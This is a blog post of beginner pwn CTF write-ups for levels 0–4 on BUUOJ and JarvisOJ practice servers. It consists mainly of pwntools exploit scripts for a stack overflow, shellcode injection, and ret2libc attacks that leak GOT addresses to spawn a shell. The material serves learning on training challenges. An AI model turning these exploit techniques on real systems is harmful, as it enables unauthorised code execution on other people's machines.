pwn-ctf

pwn_start

Posted by marginal on 2021-10-04
Estimated Reading Time 2 Minutes
Words 435 In Total
Viewed Times

pwn入门 level题目

level0:

栈溢出

1
2
3
4
5
from pwn import *
r=remote('node4.buuoj.cn', xxxxx)
payload = b'a' * (0x80 + 8) + p64(0x0000000000400596)
r.sendline(payload)
r.interactive()

level1:

shellcode

1
2
3
4
5
6
7
8
from pwn import *
r = process(['/mnt/d/TH/ctf/buuoj/level1'])
shellcode = asm(shellcraft.sh())
buf = r.recvline()[14:-2]
buf = int(buf, 16)
payload = shellcode + b'a' * (136 + 4 - len(shellcode)) + p32(buf)
r.sendline(payload)
r.interactive()

level2:

劫持rip, 转到system函数, 然后提前把参数压到栈中.

level3:

利用write输出从got表中write的地址获得偏移, 然后算出库中具体system和binsh内存地址.(地址泄露)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
r = connect("pwn2.jarvisoj.com", 9879)
#r = process(['/mnt/d/TH/ctf/buuoj/level2'])
#shellcode = asm(shellcraft.sh())
elf = ELF("./level3")
writeplt = elf.plt["write"]
writegot = elf.got["write"]
fun = elf.symbols["vulnerable_function"]
lib = ELF("./libc-2.19.so")
writelib = 0x000DD460
systemlib = 0x00040310
bsh = 0x00162D4C
buf = r.recvline()
payload = b'a' * (136 + 4) + p32(writeplt) + p32(fun) + p32(1) + p32(writegot) + p32(4)
r.sendline(payload)
writeaddr = u32(r.recvline()[0:4])
payload = b'a' * (136 + 4) + p32(writeaddr - writelib + systemlib) + p32(0) + p32(writeaddr - writelib + bsh)
r.sendline(payload)
r.interactive()

level4:

利用工具LibcSearcher, 本来想用dyn的, 但是不知道为什么报错.用LibcSearcher搜索出来的都是官方库, dyn是直接dump出来靶机的库.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
from LibcSearcher import *
r = connect("pwn2.jarvisoj.com", 9880)
#r = process(['/mnt/d/TH/ctf/jarvis/level4'])
#shellcode = asm(shellcraft.sh())
e = ELF("./level4")
writeplt = e.plt["write"]
writegot = e.got["write"]
readplt = e.plt["read"]
data_seg = 0x0804A01C
fun = e.symbols["vulnerable_function"]
payload = b'a' * (0x88 + 0x4) + p32(writeplt) + p32(fun) + p32(1) + p32(writegot) + p32(4)
r.sendline(payload)
writeaddr = u32(r.recv(4))
libc = LibcSearcher("write", writeaddr)
deviation = writeaddr - libc.dump("write")
sys_addr = libc.dump("system") + deviation
payload = b'a' * (0x88 + 0x4) + p32(readplt) + p32(fun) + p32(0) + p32(data_seg) + p32(0x8)
r.sendline(payload)
r.sendline("/bin/sh")
payload = b'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(data_seg)
r.sendline(payload)
r.interactive()

level5:

如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !

特色标签
pwn-ctf
链友
ESC